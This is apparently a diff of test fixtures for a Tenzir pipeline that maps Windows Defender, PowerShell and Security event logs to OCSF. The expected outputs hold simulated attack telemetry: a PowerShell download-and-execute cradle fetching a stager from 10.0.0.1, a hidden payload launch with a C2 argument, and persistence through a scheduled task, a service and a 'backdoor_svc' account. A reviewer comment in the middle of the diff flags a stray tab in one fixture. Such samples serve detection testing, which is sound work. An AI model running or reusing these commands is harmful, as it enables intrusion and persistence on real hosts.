a/microsoft/tests/ocsf/eid-1007.tql b/microsoft/tests/ocsf/eid-1007.tql index bbe415e..1a12c35 100644 --- a/microsoft/tests/ocsf/eid-1007.tql +++ b/microsoft/tests/ocsf/eid-1007.tql 
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-1007.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-1007.txt b/microsoft/tests/ocsf/eid-1007.txt
index 0fbb9ef..4fb0a8e 100644
--- a/microsoft/tests/ocsf/eid-1007.txt
+++ b/microsoft/tests/ocsf/eid-1007.txt
@@ -52,6 +52,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 1007\n 0\n 4\n 0\n 0x8000000000000000\n \n 41007\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Trojan:Win32/Meterpreter.A!MSR\n 2147735503\n Severe\n Trojan\n Quarantine\n NT AUTHORITY\\SYSTEM\n 1.405.12.0\n 1.1.24010.10\n \n\n",
+ raw_data_size: 1054,
 severity: "Critical",
 severity_id: 5,
 time: 2024-03-23T12:34:58.123456700Z,
diff --git a/microsoft/tests/ocsf/eid-1102.tql b/microsoft/tests/ocsf/eid-1102.tql
index 92071e4..59d7d59 100644
--- a/microsoft/tests/ocsf/eid-1102.tql
+++ b/microsoft/tests/ocsf/eid-1102.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-1102.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-1102.txt b/microsoft/tests/ocsf/eid-1102.txt
index 0853412..8bf4313 100644
--- a/microsoft/tests/ocsf/eid-1102.txt
+++ b/microsoft/tests/ocsf/eid-1102.txt
@@ -44,6 +44,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 1102\n 0\n 4\n 104\n 0x4020000000000000\n \n 99001\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 0x1234\n 131972735680000000\n \n\n",
+ raw_data_size: 949,
 severity: "High",
 severity_id: 4,
 time: 2024-03-23T12:34:56.789012300Z,
diff --git a/microsoft/tests/ocsf/eid-1116.tql b/microsoft/tests/ocsf/eid-1116.tql
index dd1c6de..1e6b55a 100644
--- a/microsoft/tests/ocsf/eid-1116.tql
+++ b/microsoft/tests/ocsf/eid-1116.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-1116.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-1116.txt b/microsoft/tests/ocsf/eid-1116.txt
index a334e6b..d59c8af 100644
--- a/microsoft/tests/ocsf/eid-1116.txt
+++ b/microsoft/tests/ocsf/eid-1116.txt
@@ -72,6 +72,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 1116\n 0\n 3\n 0\n 0x8000000000000000\n \n 41116\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n {A1B2C3D4-E5F6-7A8B-9C0D-1E2F3A4B5C6D}\n 2024-03-23T12:34:56.789012300Z\n \n \n 2147735503\n Trojan:Win32/Meterpreter.A!MSR\n 5\n Severe\n 8\n Trojan\n https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Meterpreter.A!MSR&threatid=2147735503\n 1\n \n 1\n 4\n Real-time Protection\n C:\\tmp\\payload.exe\n CORP\\jdoe\n \n C:\\tmp\\payload.exe\n 1\n Local machine\n 1\n Suspended\n 0\n Concrete\n 0\n 9\n Not Applicable\n \n 1.405.12.0\n 1.1.24010.10\n \n\n",
+ raw_data_size: 2346,
 severity: "Critical",
 severity_id: 5,
 time: 2024-03-23T12:34:56.789012300Z,
diff --git a/microsoft/tests/ocsf/eid-1117.tql b/microsoft/tests/ocsf/eid-1117.tql
index 8fda408..e4c1c9b 100644
--- a/microsoft/tests/ocsf/eid-1117.tql
+++ b/microsoft/tests/ocsf/eid-1117.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-1117.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-1117.txt b/microsoft/tests/ocsf/eid-1117.txt
index 40294ac..0026ebf 100644
--- a/microsoft/tests/ocsf/eid-1117.txt
+++ b/microsoft/tests/ocsf/eid-1117.txt
@@ -72,6 +72,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 1117\n 0\n 4\n 0\n 0x8000000000000000\n \n 41117\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n {A1B2C3D4-E5F6-7A8B-9C0D-1E2F3A4B5C6D}\n 2024-03-23T12:34:56.789012300Z\n \n \n 2147735503\n Trojan:Win32/Meterpreter.A!MSR\n 5\n Severe\n 8\n Trojan\n https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Meterpreter.A!MSR&threatid=2147735503\n 1\n \n 2\n 4\n Real-time Protection\n C:\\tmp\\payload.exe\n CORP\\jdoe\n \n C:\\tmp\\payload.exe\n 1\n Local machine\n 1\n Suspended\n 0\n Concrete\n 0\n 2\n Quarantine\n NT AUTHORITY\\SYSTEM\n 1.405.12.0\n 1.1.24010.10\n \n\n",
+ raw_data_size: 2361,
 severity: "Critical",
 severity_id: 5,
 time: 2024-03-23T12:34:58.123456700Z,
diff --git a/microsoft/tests/ocsf/eid-1121.tql b/microsoft/tests/ocsf/eid-1121.tql
index ba6e840..aa061ba 100644
--- a/microsoft/tests/ocsf/eid-1121.tql
+++ b/microsoft/tests/ocsf/eid-1121.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-1121.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-1121.txt b/microsoft/tests/ocsf/eid-1121.txt
index 0046897..0f71cf6 100644
--- a/microsoft/tests/ocsf/eid-1121.txt
+++ b/microsoft/tests/ocsf/eid-1121.txt
@@ -80,6 +80,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 1121\n 0\n 3\n 0\n 0x8000000000000000\n \n 41121\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n C:\\tmp\\payload.exe\n C:\\tmp\\payload.exe\n SHA256=AABBCCDDEEFF00112233445566778899AABBCCDDEEFF00112233445566778899\n CORP\\jdoe\n 4.18.24010.12\n C:\\tmp\\payload.exe\n Exploit:Win32/CVE-2024-99999\n d4f940ab-401b-4efc-aadc-ad5f3c50688a\n Block process creations originating from PSExec and WMI commands\n \n\n",
+ raw_data_size: 1331,
 severity: "High",
 severity_id: 4,
 time: 2024-03-23T12:34:56.789012300Z,
diff --git a/microsoft/tests/ocsf/eid-2000.tql b/microsoft/tests/ocsf/eid-2000.tql
index a922689..800607e 100644
--- a/microsoft/tests/ocsf/eid-2000.tql
+++ b/microsoft/tests/ocsf/eid-2000.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-2000.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-2000.txt b/microsoft/tests/ocsf/eid-2000.txt
index c32a236..d0ebfad 100644
--- a/microsoft/tests/ocsf/eid-2000.txt
+++ b/microsoft/tests/ocsf/eid-2000.txt
@@ -31,6 +31,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 2000\n 0\n 4\n 0\n 0x8000000000000000\n \n 42000\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n 1.405.12.0\n 1.405.11.0\n Microsoft Malware Protection Center\n Install\n https://go.microsoft.com/fwlink/?linkid=74005\n AntiVirus\n Full\n NT AUTHORITY\\SYSTEM\n 1.1.24010.10\n 1.1.24010.10\n \n\n",
+ raw_data_size: 1245,
 severity: "Informational",
 severity_id: 1,
 time: 2024-03-23T12:35:01Z,
diff --git a/microsoft/tests/ocsf/eid-4100.tql b/microsoft/tests/ocsf/eid-4100.tql
index 8bef252..6197f00 100644
--- a/microsoft/tests/ocsf/eid-4100.tql
+++ b/microsoft/tests/ocsf/eid-4100.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4100.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4100.txt b/microsoft/tests/ocsf/eid-4100.txt
index 3edd2ca..f268b27 100644
--- a/microsoft/tests/ocsf/eid-4100.txt
+++ b/microsoft/tests/ocsf/eid-4100.txt
@@ -44,6 +44,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4100\n 1\n 3\n 1\n 0x0\n \n 20100\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n -2146233087\n Access to the path 'C:\\Windows\\System32\\payload.exe' is denied.\n Error\n ConsoleHost\n 5.1.19041.4648\n {{a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}}\n C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n 5.1.19041.4648\n {{f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}}\n 2\n \n Copy-Item -Path C:\\tmp\\payload.exe -Destination C:\\Windows\\System32\\\n Copy-Item\n CORP\\jdoe\n \n Microsoft.PowerShell\n \n\n",
+ raw_data_size: 1600,
 script: {
 name: "Copy-Item",
 type: "PowerShell",
diff --git a/microsoft/tests/ocsf/eid-4103.tql b/microsoft/tests/ocsf/eid-4103.tql
index a310227..fb1a200 100644
--- a/microsoft/tests/ocsf/eid-4103.tql
+++ b/microsoft/tests/ocsf/eid-4103.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4103.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4103.txt b/microsoft/tests/ocsf/eid-4103.txt
index eb075a8..80ac0b4 100644
--- a/microsoft/tests/ocsf/eid-4103.txt
+++ b/microsoft/tests/ocsf/eid-4103.txt
@@ -31,6 +31,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4103\n 1\n 4\n 1\n 0x0\n \n 20103\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n Severity = Informational\n Host Name = ConsoleHost\n Host Version = 5.1.19041.4648\n Host ID = {{a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}}\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n Engine Version = 5.1.19041.4648\n Runspace ID = {{f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}}\n Pipeline ID = 3\n Command Name = Invoke-Expression\n Command Type = Cmdlet\n Script Name =\n Command Path =\n Sequence Number = 15\n User = CORP\\jdoe\n Connected User =\n Shell ID = Microsoft.PowerShell\n CommandInvocation(Invoke-Expression): \"Invoke-Expression\"\nParameterBinding(Invoke-Expression): name=\"Command\"; value=\"Start-Process -FilePath 'C:\tmp\\payload.exe' -ArgumentList '--c2 10.0.0.1' -WindowStyle Hidden\"\n \n\n",
+ raw_data_size: 1553,
 script: {
 type: "PowerShell",
 type_id: 2,
diff --git a/microsoft/tests/ocsf/eid-4104.tql b/microsoft/tests/ocsf/eid-4104.tql
index 90d213e..e18a1d2 100644
--- a/microsoft/tests/ocsf/eid-4104.tql
+++ b/microsoft/tests/ocsf/eid-4104.tql
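Review bot: In the eid-4103.txt expected output, the raw_data string spells the payload path as `'C:\tmp\\payload.exe'` — a `\t` escape, i.e. a literal tab character — while the rest of the same string (`C:\\Windows\\System32\\...`, `CORP\\jdoe`) and every other fixture in this patch write `C:\\tmp\\payload.exe` with doubled backslashes. That most likely means the input fixture eid-4103.xml holds a stray tab where `\tmp` was intended, and this hunk now freezes it into the golden file; I would correct the fixture and regenerate the expectation rather than commit the tab. The hunk's trailing context stops at `type_id: 2,`, so I cannot tell from here whether the mapped script or command field carries the same tab.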
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4104.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4104.txt b/microsoft/tests/ocsf/eid-4104.txt
index 7ecd496..c6a085e 100644
--- a/microsoft/tests/ocsf/eid-4104.txt
+++ b/microsoft/tests/ocsf/eid-4104.txt
@@ -31,6 +31,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4104\n 1\n 3\n 2\n 0x0\n \n 20104\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n 1\n 1\n IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/stager.ps1'); Start-Process -FilePath 'C:\\tmp\\payload.exe' -ArgumentList '--c2 10.0.0.1' -WindowStyle Hidden\n {f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}\n \n \n\n",
+ raw_data_size: 1061,
 script: {
 type: "PowerShell",
 type_id: 2,
diff --git a/microsoft/tests/ocsf/eid-4105.tql b/microsoft/tests/ocsf/eid-4105.tql
index f7042be..8d68e99 100644
--- a/microsoft/tests/ocsf/eid-4105.tql
+++ b/microsoft/tests/ocsf/eid-4105.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4105.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4105.txt b/microsoft/tests/ocsf/eid-4105.txt
index 48a12cb..59d0611 100644
--- a/microsoft/tests/ocsf/eid-4105.txt
+++ b/microsoft/tests/ocsf/eid-4105.txt
@@ -36,6 +36,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4105\n 1\n 5\n 2\n 0x0\n \n 20105\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n {f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}\n {a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}\n \n\n",
+ raw_data_size: 837,
 script: {
 type: "PowerShell",
 type_id: 2,
diff --git a/microsoft/tests/ocsf/eid-4106.tql b/microsoft/tests/ocsf/eid-4106.tql
index 11ac110..ccc75af 100644
--- a/microsoft/tests/ocsf/eid-4106.tql
+++ b/microsoft/tests/ocsf/eid-4106.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4106.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4106.txt b/microsoft/tests/ocsf/eid-4106.txt
index eaf1ed0..3f4972f 100644
--- a/microsoft/tests/ocsf/eid-4106.txt
+++ b/microsoft/tests/ocsf/eid-4106.txt
@@ -36,6 +36,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4106\n 1\n 5\n 2\n 0x0\n \n 20106\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n {f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}\n {a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}\n \n\n",
+ raw_data_size: 837,
 script: {
 type: "PowerShell",
 type_id: 2,
diff --git a/microsoft/tests/ocsf/eid-4624.tql b/microsoft/tests/ocsf/eid-4624.tql
index d89f11a..151d564 100644
--- a/microsoft/tests/ocsf/eid-4624.tql
+++ b/microsoft/tests/ocsf/eid-4624.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4624.txt b/microsoft/tests/ocsf/eid-4624.txt
index 622dd88..195b925 100644
--- a/microsoft/tests/ocsf/eid-4624.txt
+++ b/microsoft/tests/ocsf/eid-4624.txt
@@ -45,6 +45,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4624\n 2\n 0\n 12544\n 0x8020000000000000\n \n 98761\n \n \n Security\n DC01.corp.local\n \n \n S-1-0-0\n -\n -\n 0x0\n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 3\n Kerberos\n Kerberos\n -\n {B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}\n -\n -\n 0\n 0x0\n -\n 10.0.0.42\n 49827\n %%1833\n -\n -\n -\n %%1843\n 0x0\n %%1842\n \n\n",
+ raw_data_size: 1918,
 session: {
 uid: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}",
 uid_alt: "0xA1B2C3",
diff --git a/microsoft/tests/ocsf/eid-4625.tql b/microsoft/tests/ocsf/eid-4625.tql
index 611473d..734cb5b 100644
--- a/microsoft/tests/ocsf/eid-4625.tql
+++ b/microsoft/tests/ocsf/eid-4625.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4625.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4625.txt b/microsoft/tests/ocsf/eid-4625.txt
index 1311115..2116e1c 100644
--- a/microsoft/tests/ocsf/eid-4625.txt
+++ b/microsoft/tests/ocsf/eid-4625.txt
@@ -45,6 +45,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4625\n 0\n 0\n 12546\n 0x8020000000000000\n \n 98762\n \n \n Security\n DC01.corp.local\n \n \n S-1-0-0\n -\n -\n 0x0\n S-1-0-0\n Administrator\n CORP\n 0xC000006D\n %%2313\n 0xC000006A\n 3\n NtLmSsp\n NTLM\n WINHOST01\n -\n -\n 0\n 0x0\n -\n 10.0.0.42\n 49827\n \n\n",
+ raw_data_size: 1569,
 severity: "Low",
 severity_id: 2,
 src_endpoint: {
diff --git a/microsoft/tests/ocsf/eid-4648.tql b/microsoft/tests/ocsf/eid-4648.tql
index af04fb8..2cb1610 100644
--- a/microsoft/tests/ocsf/eid-4648.tql
+++ b/microsoft/tests/ocsf/eid-4648.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4648.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4648.txt b/microsoft/tests/ocsf/eid-4648.txt
index b70f6cd..8988d8e 100644
--- a/microsoft/tests/ocsf/eid-4648.txt
+++ b/microsoft/tests/ocsf/eid-4648.txt
@@ -56,6 +56,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4648\n 0\n 0\n 12544\n 0x8020000000000000\n \n 98763\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n {00000000-0000-0000-0000-000000000000}\n svc_backup\n CORP\n {00000000-0000-0000-0000-000000000000}\n fileserver.corp.local\n fileserver.corp.local\n 0xA1B2C3\n C:\\tmp\\payload.exe\n 10.0.0.1\n 445\n \n\n",
+ raw_data_size: 1421,
 severity: "Informational",
 severity_id: 1,
 src_endpoint: {
diff --git a/microsoft/tests/ocsf/eid-4672.tql b/microsoft/tests/ocsf/eid-4672.tql
index 3c32717..eb64c2c 100644
--- a/microsoft/tests/ocsf/eid-4672.tql
+++ b/microsoft/tests/ocsf/eid-4672.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4672.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4672.txt b/microsoft/tests/ocsf/eid-4672.txt
index 601b432..6039c93 100644
--- a/microsoft/tests/ocsf/eid-4672.txt
+++ b/microsoft/tests/ocsf/eid-4672.txt
@@ -44,6 +44,8 @@
 "SeSystemEnvironmentPrivilege",
 "SeImpersonatePrivilege",
 ],
+ raw_data: "\n \n \n 4672\n 0\n 0\n 12548\n 0x8020000000000000\n \n 98762\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-18\n SYSTEM\n NT AUTHORITY\n 0x3e7\n SeAssignPrimaryTokenPrivilege SeTcbPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeAuditPrivilege SeSystemEnvironmentPrivilege SeImpersonatePrivilege\n \n\n",
+ raw_data_size: 1086,
 session: {
 uid_alt: "0x3e7",
 },
diff --git a/microsoft/tests/ocsf/eid-4688.tql b/microsoft/tests/ocsf/eid-4688.tql
index 0ed3bb8..bce49da 100644
--- a/microsoft/tests/ocsf/eid-4688.tql
+++ b/microsoft/tests/ocsf/eid-4688.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4688.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4688.txt b/microsoft/tests/ocsf/eid-4688.txt
index 5c1900e..b42a098 100644
--- a/microsoft/tests/ocsf/eid-4688.txt
+++ b/microsoft/tests/ocsf/eid-4688.txt
@@ -66,6 +66,8 @@
 path: "C:\\tmp\\payload.exe",
 pid: 6732,
 },
+ raw_data: "\n \n \n 4688\n 2\n 0\n 13312\n 0x8020000000000000\n \n 98764\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 0x1a4c\n C:\\tmp\\payload.exe\n %%1937\n 0x1234\n payload.exe --c2 10.0.0.1\n S-1-0-0\n -\n -\n 0x0\n C:\\Windows\\System32\\wscript.exe\n S-1-16-8192\n \n\n",
+ raw_data_size: 1429,
 severity: "Informational",
 severity_id: 1,
 status: "Success",
diff --git a/microsoft/tests/ocsf/eid-4697.tql b/microsoft/tests/ocsf/eid-4697.tql
index b702364..9542ccc 100644
--- a/microsoft/tests/ocsf/eid-4697.tql
+++ b/microsoft/tests/ocsf/eid-4697.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4697.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4697.txt b/microsoft/tests/ocsf/eid-4697.txt
index 6b9fa46..1fd6edf 100644
--- a/microsoft/tests/ocsf/eid-4697.txt
+++ b/microsoft/tests/ocsf/eid-4697.txt
@@ -41,6 +41,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4697\n 0\n 0\n 12289\n 0x8020000000000000\n \n 98765\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n PayloadSvc\n C:\\tmp\\payload.exe --svc\n 0x10\n 2\n LocalSystem\n \n\n",
+ raw_data_size: 1124,
 severity: "Informational",
 severity_id: 1,
 time: 2024-03-23T12:34:56.789012300Z,
diff --git a/microsoft/tests/ocsf/eid-4698.tql b/microsoft/tests/ocsf/eid-4698.tql
index b29f9eb..e407887 100644
--- a/microsoft/tests/ocsf/eid-4698.tql
+++ b/microsoft/tests/ocsf/eid-4698.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4698.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4698.txt b/microsoft/tests/ocsf/eid-4698.txt
index 975595f..f6e7a8f 100644
--- a/microsoft/tests/ocsf/eid-4698.txt
+++ b/microsoft/tests/ocsf/eid-4698.txt
@@ -47,6 +47,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4698\n 0\n 0\n 12804\n 0x8020000000000000\n \n 98766\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><Triggers><BootTrigger><StartBoundary>2024-03-23T12:00:00</StartBoundary><Enabled>true</Enabled></BootTrigger></Triggers><Actions Context="Author"><Exec><Command>C:\\tmp\\payload.exe</Command><Arguments>--c2 10.0.0.1</Arguments></Exec></Actions></Task>\n 720575940379820032\n 0x1a4c\n 0x1234\n 0\n WINHOST01.corp.local\n \n\n",
+ raw_data_size: 1728,
 severity: "Informational",
 severity_id: 1,
 time: 2024-03-23T12:34:56.789012300Z,
diff --git a/microsoft/tests/ocsf/eid-4720.tql b/microsoft/tests/ocsf/eid-4720.tql
index 6ce7646..19f97bd 100644
--- a/microsoft/tests/ocsf/eid-4720.tql
+++ b/microsoft/tests/ocsf/eid-4720.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4720.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4720.txt b/microsoft/tests/ocsf/eid-4720.txt
index c2e0b98..45f1280 100644
--- a/microsoft/tests/ocsf/eid-4720.txt
+++ b/microsoft/tests/ocsf/eid-4720.txt
@@ -41,6 +41,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4720\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98767\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n backdoor_svc\n %%1793\n -\n %%1793\n %%1793\n %%1793\n %%1793\n %%1793\n %%1794\n %%1794\n 513\n -\n 0x0\n 0x15\n %%2080 %%2082 %%2084\n %%1793\n -\n %%1797\n -\n \n\n",
+ raw_data_size: 1899,
 severity: "Informational",
 severity_id: 1,
 time: 2024-03-23T12:34:56.789012300Z,
